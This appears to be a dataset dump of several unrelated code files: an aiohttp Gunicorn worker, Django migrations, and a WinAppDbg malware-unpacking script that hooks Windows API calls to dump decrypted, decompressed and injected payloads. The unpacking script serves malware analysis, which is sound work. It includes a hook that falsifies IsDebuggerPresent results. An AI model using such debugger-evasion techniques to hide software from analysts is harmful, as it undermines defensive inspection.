ssl = None # type: ignore[assignment]
SSLContext = object # type: ignore[misc,assignment]
__all__ = ("GunicornWebWorker", "GunicornUVLoopWebWorker", "GunicornTokioWebWorker")
class GunicornWebWorker(base.Worker): # type: ignore[misc,no-any-unimported]
DEFAULT_AIOHTTP_LOG_FORMAT = AccessLogger.LOG_FORMAT
DEFAULT_GUNICORN_LOG_FORMAT = GunicornAccessLogFormat.default
def __init__(self, *args: Any, **kw: Any) -> None: # pragma: no cover
super().__init__(*args, **kw)
self._task = None # type: Optional[asyncio.Task[None]]
self.exit_code = 0
self._notify_waiter = None # type: Optional[asyncio.Future[bool]]
def init_process(self) -> None:
# create new event_loop after fork
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
super().init_process()
def run(self) -> None:
self._task = self.loop.create_task(self._run())
try: # ignore all finalization problems
self.loop.run_until_complete(self._task)
except Exception:
self.log.exception("Exception in gunicorn worker")
self.loop.run_until_complete(self.loop.shutdown_asyncgens())
self.loop.close()
sys.exit(self.exit_code)
async def _run(self) -> None:
if isinstance(self.wsgi, Application):
app = self.wsgi
elif asyncio.iscoroutinefunction(self.wsgi):
app = await self.wsgi()
else:
raise RuntimeError(
"wsgi app should be either Application or "
"async function returning Application, got {}".format(self.wsgi)
)
access_log = self.log.access_log if self.cfg.accesslog else None
runner = web.AppRunner(
app,
logger=self.log,
keepalive_timeout=self.cfg.keepalive,
access_log=access_log,
access_log_format=self._get_valid_log_format(self.cfg.access_log_format),
)
await runner.setup()
ctx = self._create_ssl_context(self.cfg) if self.cfg.is_ssl else None
assert runner is not None
server = runner.server
assert server is not None
for sock in self.sockets:
site = web.SockSite(
runner,
sock,
ssl_context=ctx,
shutdown_timeout=self.cfg.graceful_timeout / 100 * 95,
)
await site.start()
# If our parent changed then we shut down.
pid = os.getpid()
try:
while self.alive: # type: ignore[has-type]
self.notify()
cnt = server.requests_count
if self.cfg.max_requests and cnt > self.cfg.max_requests:
self.alive = False
self.log.info("Max requests, shutting down: %s", self)
elif pid == os.getpid() and self.ppid != os.getppid():
self.alive = False
self.log.info("Parent changed, shutting down: %s", self)
else:
await self._wait_next_notify()
except BaseException:
pass
await runner.cleanup()
def _wait_next_notify(self) -> "asyncio.Future[bool]":
self._notify_waiter_done()
loop = self.loop
assert loop is not None
self._notify_waiter = waiter = loop.create_future()
self.loop.call_later(1.0, self._notify_waiter_done, waiter)
return waiter
def _notify_waiter_done(
self, waiter: Optional["asyncio.Future[bool]"] = None
) -> None:
if waiter is None:
waiter = self._notify_waiter
if waiter is not None:
set_result(waiter, True)
if waiter is self._notify_waiter:
self._notify_waiter = None
def init_signals(self) -> None:
# Set up signals through the event loop API.
self.loop.add_signal_handler(
signal.SIGQUIT, self.handle_quit, signal.SIGQUIT, None
)
self.loop.add_signal_handler(
signal.SIGTERM, self.handle_exit, signal.SIGTERM, None
)
self.loop.add_signal_handler(
signal.SIGINT, self.handle_quit, signal.SIGINT, None
)
self.loop.add_signal_handler(
signal.SIGWINCH, self.handle_winch, signal.SIGWINCH, None
)
self.loop.add_signal_handler(
signal.SIGUSR1, self.handle_usr1, signal.SIGUSR1, None
)
self.loop.add_signal_handler(
signal.SIGABRT, self.handle_abort, signal.SIGABRT, None
)
# Don't let SIGTERM and SIGUSR1 disturb active requests
# by interrupting system calls
signal.siginterrupt(signal.SIGTERM, False)
signal.siginterrupt(signal.SIGUSR1, False)
def handle_quit(self, sig: int, frame: FrameType) -> None:
self.alive = False
# worker_int callback
self.cfg.worker_int(self)
# wakeup closing process
self._notify_waiter_done()
def handle_abort(self, sig: int, frame: FrameType) -> None:
self.alive = False
self.exit_code = 1
self.cfg.worker_abort(self)
sys.exit(1)
@staticmethod
def _create_ssl_context(cfg: Any) -> "SSLContext":
"""Creates SSLContext instance for usage in asyncio.create_server.
See ssl.SSLSocket.__init__ for more details.
"""
if ssl is None: # pragma: no cover
raise RuntimeError("SSL is not supported.")
ctx = ssl.SSLContext(cfg.ssl_version)
ctx.load_cert_chain(cfg.certfile, cfg.keyfile)
ctx.verify_mode = cfg.cert_reqs
if cfg.ca_certs:
ctx.load_verify_locations(cfg.ca_certs)
if cfg.ciphers:
ctx.set_ciphers(cfg.ciphers)
return ctx
def _get_valid_log_format(self, source_format: str) -> str:
if source_format == self.DEFAULT_GUNICORN_LOG_FORMAT:
return self.DEFAULT_AIOHTTP_LOG_FORMAT
elif re.search(r"%\([^\)]+\)", source_format):
raise ValueError(
"Gunicorn's style options in form of `%(name)s` are not "
"supported for the log formatting. Please use aiohttp's "
"format specification to configure access log formatting: "
"http://docs.aiohttp.org/en/stable/logging.html"
"#format-specification"
)
else:
return source_format
class GunicornUVLoopWebWorker(GunicornWebWorker):
def init_process(self) -> None:
import uvloop
# Setup uvloop policy, so that every
# asyncio.get_event_loop() will create an instance
# of uvloop event loop.
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
super().init_process()
class GunicornTokioWebWorker(GunicornWebWorker):
def init_process(self) -> None: # pragma: no cover
import tokio
# Setup tokio policy, so that every
# asyncio.get_event_loop() will create an instance
# of tokio event loop.
asyncio.set_event_loop_policy(tokio.EventLoopPolicy())
super().init_process()
|
apache-2.0
| -3,391,215,136,565,814,000
| 31.291667
| 85
| 0.600129
| false
| 3.938008
| false
| false
| false
|
mbourqui/django-publications-bootstrap
|
publications_bootstrap/migrations/0004_catalog_fk_publication.py
|
1
|
1253
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-04 09:18
from __future__ import unicode_literals
from __future__ import unicode_literals
from django.db import migrations
from django.db import models
app_label = 'publications_bootstrap'
def forwards(apps, schema_editor):
Catalog = apps.get_model(app_label, "Catalog")
for catalog in Catalog.objects.all():
for publication in catalog.publication_set.all():
catalog.publications.add(publication)
def backwards(apps, schema_editor):
Catalog = apps.get_model(app_label, "Catalog")
for catalog in Catalog.objects.all():
for publication in catalog.publications.all():
publication.catalog_set.add(catalog)
class Migration(migrations.Migration):
dependencies = [
('publications_bootstrap', '0003_db_index'),
]
operations = [
migrations.AddField(
model_name='catalog',
name='publications',
field=models.ManyToManyField(blank=True, db_index=True, to='publications_bootstrap.Publication'),
),
migrations.RunPython(forwards, backwards),
migrations.RemoveField(
model_name='publication',
name='catalogs',
),
]
|
mit
| 7,605,762,743,376,821,000
| 28.139535
| 109
| 0.652035
| false
| 4.218855
| false
| false
| false
|
undocume/undocume
|
home/migrations/0004_auto__add_field_service_city.py
|
1
|
6463
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Service.city'
db.add_column(u'home_service', 'city',
self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Service.city'
db.delete_column(u'home_service', 'city')
models = {
u'home.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.categorytranslate': {
'Meta': {'object_name': 'CategoryTranslate'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Category']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'home.information': {
'Meta': {'ordering': "['name']", 'object_name': 'Information'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'informationtype': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.InformationType']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.informationtranslate': {
'Meta': {'object_name': 'InformationTranslate'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'information': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Information']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'home.informationtype': {
'Meta': {'ordering': "['name']", 'object_name': 'InformationType'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.service': {
'Meta': {'ordering': "['name']", 'object_name': 'Service'},
'Type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.TypeOrganization']"}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Category']"}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contactemail': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'contactnumber': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'fee': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'ss': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'web': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'})
},
u'home.servicetranslate': {
'Meta': {'object_name': 'ServiceTranslate'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Service']"})
},
u'home.typeorganization': {
'Meta': {'ordering': "['name']", 'object_name': 'TypeOrganization'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['home']
|
mit
| -1,723,778,893,577,949,000
| 64.292929
| 126
| 0.540771
| false
| 3.688927
| false
| false
| false
|
dchad/malware-detection
|
vs/unpack.py
|
1
|
37916
|
##############################################################
# Python script to attempt automatic unpacking/decrypting of #
# malware samples using WinAppDbg. #
# #
# unpack.py v2016.01.25 #
# http://malwaremusings.com/scripts/unpack.py #
##############################################################
import sys
import traceback
import winappdbg
import time
import struct
import ctypes
# Log file which we log info to
logfile = None
class MyEventHandler(winappdbg.EventHandler):
###
# A. Declaring variables
###
# A.1 used to keep track of allocated executable memory
allocedmem = {}
# A.2 used to indicate that we've found the entry point
entrypt = 0x00000000
#
# variables used to find and disassemble unpacking loop
#
# A.3 used to indicate that we're single stepping
tracing = -1
# A.4 remember the last two eip values
lasteip = [0x00000000,0x00000000]
# A.5 lowest eip address we see
lowesteip = 0xffffffff
# A.6 highest eip address we see
highesteip = 0x00000000
# A.7 list of addresses which we've disassembled
disasmd = []
# A.8 keeps track of addresses and instructions
# that write to the allocated memory block(s)
writeaddrs = {}
#
# variables used to keep track of created processes
#
# A.9 keeps track of created processes to map
# hProcess from WriteProcessMemory() back to
# process name
createdprocesses = {}
# A.10 keeps track of processes that were created
# with the CREATE_SUSPENDED flag set
createsuspended = {}
#
# variables used for logging
#
# A.11 used to keep a log of events
eventlog = []
###
# B. Class methods (functions)
###
### B.1
# get_funcargs(event)
# query winappdbg to get the function arguments
#
# return a tuple consisting of the return address
# and a sub-tuple of function arguments
###
def get_funcargs(self,event):
h = event.hook
t = event.get_thread()
tid = event.get_tid()
return (t.get_pc(),h.get_params(tid))
### B.2
# guarded_read(d,t,addr,size)
# read memory after checking for, and if necessary,
# disabling memory breakpoints
#
# returns a string of data
###
def guarded_read(self,d,t,addr,size):
# keep track of breakpoints that we disabled
# so that we can enable them again after we've
# finished
reenablebps = []
# initialise the variable to hold the read
# memory data
data = ""
# check that the requested size is sane
if (size > 0):
p = t.get_process()
# check to see if the requested address falls within
# any of the existing memory breakpoints by checking
# if either the requested start address or end address
# is covered by any breakpoint
mem_bps = d.get_all_page_breakpoints()
for (pid,pgbp) in mem_bps:
(startaddr,endaddr) = pgbp.get_span()
if (pid == p.get_pid()) and (pgbp.is_here(addr) or pgbp.is_here(addr + size - 1)):
log("[D] Memory read in guarded memory. Disabling breakpoint: %s" % pgbp)
pgbp.disable(p,t)
reenablebps.append(pgbp)
# read the memory
data = p.read(addr,size)
# enable all of the breakpoints that we disabled
if (len(reenablebps) > 0):
for pgbp in reenablebps:
log("[D] Re-enabling breakpoint: %s" % pgbp)
pgbp.enable(p,t)
# return the read memory as a string
return data
###
# C. API Hooks
###
### C.1
# apiHooks: winappdbg defined hash of API calls to hook
#
# Each entry is indexed by library name and is an array of
# tuples consisting of API call name and number of args
###
apiHooks = {
"kernel32.dll":[
("VirtualAlloc",4),
("VirtualAllocEx",5),
("IsDebuggerPresent",0),
("CreateProcessA",10),
("CreateProcessW",10),
("WriteProcessMemory",5)
],
"advapi32.dll":[
("CryptDecrypt",6)
],
"wininet.dll":[
("InternetOpenA",5),
("InternetOpenW",5)
],
"ntdll.dll":[
("RtlDecompressBuffer",6)
],
"secur32.dll":[
("EncryptMessage",4),
("DecryptMessage",4)
]
}
###
# API hook callback functions
#
# These are defined by winappdbg and consist of functions
# named pre_<apifuncname> and post_<apifuncname> which are
# called on entry to, and on exit from, the given API
# function (<apifuncname>), respectively.
###
# C.2
# VirtualAlloc() hook(s)
#
def post_VirtualAllocEx(self,event,retval):
try:
# C.2.1 Get the return address and arguments
(ra,(hProcess,lpAddress,dwSize,flAllocationType,flProtect)) = self.get_funcargs(event)
# Get an instance to the debugger which triggered the event
# and also the process id and thread id of the process to which
# the event pertains
d = event.debug
pid = event.get_pid()
tid = event.get_tid()
# Log the fact that we've seen a VirtualAllocEx() call
log("[*] <%d:%d> 0x%x: VirtualAllocEx(0x%x,0x%x,0x%x (%d),0x%x,0x%03x) = 0x%x" % (pid,tid,ra,hProcess,lpAddress,dwSize,dwSize,flAllocationType,flProtect,retval))
# C.2.2 All the memory protection bits which include EXECUTE
# permission use bits 4 - 7, which is nicely matched
# by masking (ANDing) it with 0xf0 and checking for a
# non-zero result
if (flProtect & 0x0f0):
log("[-] Request for EXECUTEable memory")
# We can only set page guards on our own process
# otherwise page guard exception will occur in
# system code when this process attempts to write
# to the allocated memory.
# This causes ZwWriteVirtualMemory() to fail
# We can, however, set a page guard on it when
# this process creates the remote thread, as it
# will have presumably stopped writing to the
# other process' memory at that point.
# C.2.2.1 Check that this VirtualAllocEx() call is for
# the current process (hProcess == -1), and if
# so, ask the winappdbg debugger instance to
# create a page guard on the memory region.
# Also add information about the allocated region
# to our allocedmem hash, indexed by pid and
# base address.
if (hProcess == 0xffffffff):
d.watch_buffer(pid,retval,dwSize - 1,self.guard_page_exemem)
self.allocedmem[(pid,retval)] = dwSize
# C.2.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "VirtualAllocEx",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hProcess": hProcess,
"lpAddress": lpAddress,
"dwSize": dwSize,
"flAllocationType": flAllocationType,
"flProtect": flProtect
},
"ret": retval
})
except:
traceback.print_exc()
raise
def post_VirtualAlloc(self,event,retval):
try:
# C.2.4 Get the return address and arguments
(ra,(lpAddress,dwSize,flAllocationType,flProtect)) = self.get_funcargs(event)
# Get an instance to the debugger which triggered the event
# and also the process id and thread id of the process to which
# the event pertains
d = event.debug
pid = event.get_pid()
tid = event.get_tid()
# Log the fact that we've seen a VirtualAlloc() call
# This is so that we get the address in the debuggee code from which it was called
# where as if we just let the VirtualAllocEx() hook log it, the address from
# which it was called is inside the VirtualAlloc() code in kernel32.dll
log("[*] <%d:%d> 0x%x: VirtualAlloc(0x%x,0x%x (%d),0x%x,0x%03x) = 0x%x" % (pid,tid,ra,lpAddress,dwSize,dwSize,flAllocationType,flProtect,retval))
# C.2.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "VirtualAlloc",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"lpAddress": lpAddress,
"dwSize": dwSize,
"flAllocationType": flAllocationType,
"flProtect": flProtect
},
"ret": retval
})
except:
traceback.print_exc()
raise
# C.3
# CryptDecrypt() hook(s)
#
def pre_CryptDecrypt(self,event,*args):
# C.3.1 Get the return address and arguments
(ra,hKey,hHash,Final,dwFlags,pbData,pdwDataLen) = (args[0],args[1],args[2],args[3],args[4],args[5],args[6])
# C.3.2 Get a Process object and dereference the pdwDataLen argument to read the buffer size
p = event.get_process()
buffsize = p.read_uint(pdwDataLen)
# C.3.3 Save a copy of the encrypted data
filename = "%s.memblk0x%x.enc" % (sys.argv[1],pbData)
log("[-] Dumping %d bytes of encrypted memory at 0x%x to %s" % (buffsize,pbData,filename))
databuff = open(filename,"wb")
databuff.write(p.read(pbData,buffsize));
databuff.close()
def post_CryptDecrypt(self,event,retval):
# C.3.4 Get the return address and arguments
(ra,(hKey,hHash,Final,dwFlags,pbData,pdwDataLen)) = self.get_funcargs(event)
# Get a Process object, and dereference the pdwDataLen argument
p = event.get_process()
buffsize = p.read_uint(pdwDataLen)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: CryptDecrypt(0x%x,0x%x,0x%x,0x%x,0x%x,0x%x (%d)) = %d" % (pid,tid,ra,hKey,hHash,Final,dwFlags,pbData,buffsize,buffsize,retval))
# C.3.5 Save a copy of the decrypted data
filename_enc = "%s.memblk0x%x.enc" % (sys.argv[1],pbData)
filename = "%s.memblk0x%x.dec" % (sys.argv[1],pbData)
log("[-] Dumping %d bytes of decrypted memory at 0x%x to %s" % (buffsize,pbData,filename))
databuff = open(filename,"wb")
databuff.write(p.read(pbData,buffsize))
databuff.close()
# C.3.6 Create a JSON event log entry
pid = event.get_pid()
tid = event.get_tid()
self.eventlog.append({
"time": time.time(),
"name": "CryptDecrypt",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hKey": hKey,
"hHash": hHash,
"Final": Final,
"dwFlags": dwFlags,
"pbData": pdwDataLen
},
"ret": retval,
"info": {
"filename_enc": filename_enc,
"filename_dec": filename
}
})
# C.4
# RtlDecompressBuffer() hook(s)
#
def pre_RtlDecompressBuffer(self,event,*args):
try:
# C.4.1 Get the return address and arguments
(ra,CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize) = (args[0],args[1],args[2],args[3],args[4],args[5],args[6])
p = event.get_process()
# C.4.2 Save a copy of the compressed data
filename = "%s.memblk0x%x.comp" % (sys.argv[1],CompressedBuffer)
log("[-] Dumping %d bytes of compressed memory at 0x%x to %s" % (CompressedBufferSize,CompressedBuffer,filename))
databuff = open(filename,"wb")
databuff.write(p.read(CompressedBuffer,CompressedBufferSize));
databuff.close()
except:
traceback.print_exc()
raise
def post_RtlDecompressBuffer(self,event,retval):
try:
# C.4.3 Get the return address and arguments
(ra,(CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: RtlDecompressBuffer(0x%x,0x%x,0x%x,0x%x,0x%x,0x%x): %d" % (pid,tid,ra,CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize,retval))
# Get a Process object, and dereference the FinalUncompressedSize argument
p = event.get_process()
buffsize = p.read_uint(FinalUncompressedSize)
# C.4.4 save a copy of the decompressed data
filename_comp = "%s.memblk0x%x.comp" % (sys.argv[1],CompressedBuffer)
filename = "%s.memblk0x%x.decomp" % (sys.argv[1],UncompressedBuffer)
log("[-] Dumping %d bytes of decompressed memory at 0x%x to %s" % (buffsize,UncompressedBuffer,filename))
databuff = open(filename,"wb")
databuff.write(p.read(UncompressedBuffer,buffsize))
databuff.close()
# C.4.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "RtlDecompressBuffer",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"CompressionFormat": CompressionFormat,
"UncompressedBuffer": UncompressedBuffer,
"UncompressedBufferSize": UncompressedBufferSize,
"CompressedBuffer": CompressedBuffer,
"CompressedBufferSize": CompressedBufferSize,
"FinalUncompressedSize": FinalUncompressedSize
},
"ret": retval,
"info": {
"filename_comp": filename_comp,
"filename_decomp": filename
}
})
except:
traceback.print_exc()
raise
# C.5
# CreateProcess() hook(s)
#
def post_CreateProcess(self,event,retval,fUnicode):
try:
# C.5.1 Get the return address and arguments
(ra,(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation)) = self.get_funcargs(event)
p = event.get_process()
t = event.get_thread()
pid = event.get_pid()
tid = event.get_tid()
# C.5.2 Dereference arguments
# Use the Process object to dereference the lpApplicationName and lpCommandLine arguments
# as either ASCII or WCHAR depending on the fUnicode argument
# (and hence whether we were called from post_CreateProcessA() or post_CreateProcessW() respectively
szApplicationName = p.peek_string(lpApplicationName,fUnicode)
szCommandLine = p.peek_string(lpCommandLine,fUnicode)
# If the lpProcessInformation argument is a valid pointer...
if (lpProcessInformation):
# ... dereference it to get the ProcessInformation structure
d = event.debug
ProcessInformation = self.guarded_read(d,t,lpProcessInformation,16)
# Extract the various fields from the ProcessInformation structure
hProcess = struct.unpack("<L",ProcessInformation[0:4])[0]
hThread = struct.unpack("<L",ProcessInformation[4:8])[0]
dwProcessId = struct.unpack("<L",ProcessInformation[8:12])[0]
dwThreadId = struct.unpack("<L",ProcessInformation[12:16])[0]
else:
log("[E] lpProcessInformation is null")
log("[*] <%d:%d> 0x%x: CreateProcess(\"%s\",\"%s\",0x%x): %d (0x%x, 0x%x, <%d:%d>)" % (pid,tid,ra,szApplicationName,szCommandLine,dwCreationFlags,retval,hProcess,hThread,dwProcessId,dwThreadId))
# C.5.3 Check if the process is being created in a suspended state (CREATE_SUSPENDED flag)...
if (dwCreationFlags & 0x4):
# ... hook the ResumeThread() API call
# so that we are notified when it is resumed
d = event.debug
stat = d.hook_function(pid,"ResumeThread",preCB = self.hook_createsuspendedresume,paramCount = 1)
self.createsuspended[(pid,hThread)] = dwProcessId
log("[-] CREATE_SUSPENDED. Hooking ResumeThread() (%d)" % stat)
# C.5.4 Keep track of processes that were created, so we know which
# process any WriteProcessMemory() calls are writing to
self.createdprocesses[hProcess] = {
"time": time.time(),
"ppid": pid,
"ptid": tid,
"paddr": ra,
"ApplicationName":szApplicationName,
"CommandLine": szCommandLine,
"CreationFlags": dwCreationFlags,
"hProcess": hProcess,
"hThread": hThread,
"ProcessId": dwProcessId,
"ThreadId": dwThreadId
}
# C.5.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "CreateProcess",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"ApplicationName":szApplicationName,
"CommandLine": szCommandLine,
"CreationFlags": dwCreationFlags,
"hProcess": hProcess,
"hThread": hThread,
"ProcessId": dwProcessId,
"ThreadId": dwThreadId
},
"info": {
"fUnicode":fUnicode
},
"ret": retval
})
except:
traceback.print_exc()
raise
# C.5.6 post_CreateProcessA() and post_CreateProcessW()
# Actual hook call-back function called by WinAppDbg
# To save duplicating code between this and post_CreateProcessW()
# both of them call post_CreateProcess() with a parameter, fUnicode,
# which specifies whether the strings are ASCII (CreateProcessA())
# or WCHAR (CreateProcessW())
def post_CreateProcessA(self,event,retval):
self.post_CreateProcess(event,retval,False)
def post_CreateProcessW(self,event,retval):
self.post_CreateProcess(event,retval,True)
# hook_createsuspendedresume() is a call-back function called when
# ResumeThread() is call by a process which has created a suspended
# process
def hook_createsuspendedresume(self,event,*args):
# C.5.7 Get the return address and arguments
(ra,(hThread,)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: ResumeThread(0x%x)" % (pid,tid,ra,hThread))
# C.5.8 Find the process id of the resumed process
if ((pid,hThread) in self.createsuspended):
pidresumed = self.createsuspended[(pid,hThread)]
log("[-] New suspended process (pid %d) resumed" % pidresumed)
# C.6
# WriteProcessMemory() hook(s)
#
def post_WriteProcessMemory(self,event,retval):
# C.6.1 Get the return address and arguments
try:
(ra,(hProcess,lpBaseAddress,lpBuffer,nSize,lpNumberOfBytesWritten)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: WriteProcessMemory(0x%x,0x%x,0x%x,0x%x,0x%x): %d" % (pid,tid,ra,hProcess,lpBaseAddress,lpBuffer,nSize,lpNumberOfBytesWritten,retval))
d = event.debug
t = event.get_thread()
# C.6.2 Dereference lpNumberOfBytesWritten to get the number of bytes written to the target process'
# address space
if (lpNumberOfBytesWritten):
NumberOfBytesWritten = struct.unpack("<L",self.guarded_read(d,t,lpNumberOfBytesWritten,4))[0]
else:
NumberOfBytesWritten = None
# C.6.3 Get process information that was saved by CreateProcess() hook
if (hProcess in self.createdprocesses):
ProcessId = self.createdprocesses[hProcess]["ProcessId"]
ApplicationName = self.createdprocesses[hProcess]["ApplicationName"]
CommandLine = self.createdprocesses[hProcess]["CommandLine"]
else:
log("[W] hProcess not in createdprocesses[]")
ProcessId = None
ApplicationName = None
CommandLine = None
d = event.debug
t = event.get_thread()
# C.6.4 Save a copy of the written memory
pid = event.get_pid()
tid = event.get_tid()
filename = "%s.memblk0x%x-%d.wpm" % (sys.argv[1],lpBaseAddress,ProcessId)
log("[-] Dumping %d bytes of memory at %d:0x%x written to %d:0x%x to %s" % (nSize,pid,lpBuffer,ProcessId,lpBaseAddress,filename))
databuff = open(filename,"wb")
databuff.write(self.guarded_read(d,t,lpBuffer,nSize))
databuff.close()
# C.6.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "WriteProcessMemory",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hProcess": hProcess,
"lpBaseAddress": lpBaseAddress,
"lpBuffer": lpBuffer,
"nSize": nSize,
"lpNumberOfBytesWritten": lpNumberOfBytesWritten,
"NumberOfBytesWritten": NumberOfBytesWritten
},
"ret": retval,
"info": {
"filename": filename,
"targetprocesspid": ProcessId,
"targetprocessname": ApplicationName,
"targetprocesscmdline": CommandLine
}
})
except:
traceback.print_exc()
raise
# C.7
# IsDebuggerPresent() hook(s)
# (mainly added so that AutoIt compiled scripts would run, but also useful
# as an anti-anti-malware technique)
#
def post_IsDebuggerPresent(self,event,retval):
# C.7.1 Get the return address and arguments
(ra,noargs) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: IsDebuggerPresent(): 0x%x" % (pid,tid,ra,retval))
log("[-] Returning 0")
# C.7.2 Changed the 'eax' register (return value) to '0' (no debugger present)
# just before we continue running the calling thread
t = event.get_thread()
t.set_register("Eax",0x0)
# C.7.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "IsDebuggerPresent",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {},
"ret": retval,
"info": {}
})
# C.8
# InternetOpen() hook(s)
#
def post_InternetOpen(self,event,retval,fUnicode):
# C.8.1 Get the return address and arguments
(ra,(lpszAgent,dwAccessType,lpszProxyName,lpszProxyBypass,dwFlags)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
# C.8.2 Dereference arguments
p = event.get_process()
szAgent = p.peek_string(lpszAgent,fUnicode)
szProxyName = p.peek_string(lpszProxyName,fUnicode)
szProxyBypass = p.peek_string(lpszProxyBypass,fUnicode)
log("[*] <%d:%d> 0x%x: InternetOpen(\"%s\",0x%x,\"%s\",\"%s\",0x%x) = 0x%x" % (pid,tid,ra,szAgent,dwAccessType,szProxyName,szProxyBypass,dwFlags,retval))
# C.8.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "InternetOpen",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {},
"ret": retval,
"info": {}
})
def post_InternetOpenA(self,event,retval):
self.post_InternetOpen(event,retval,False)
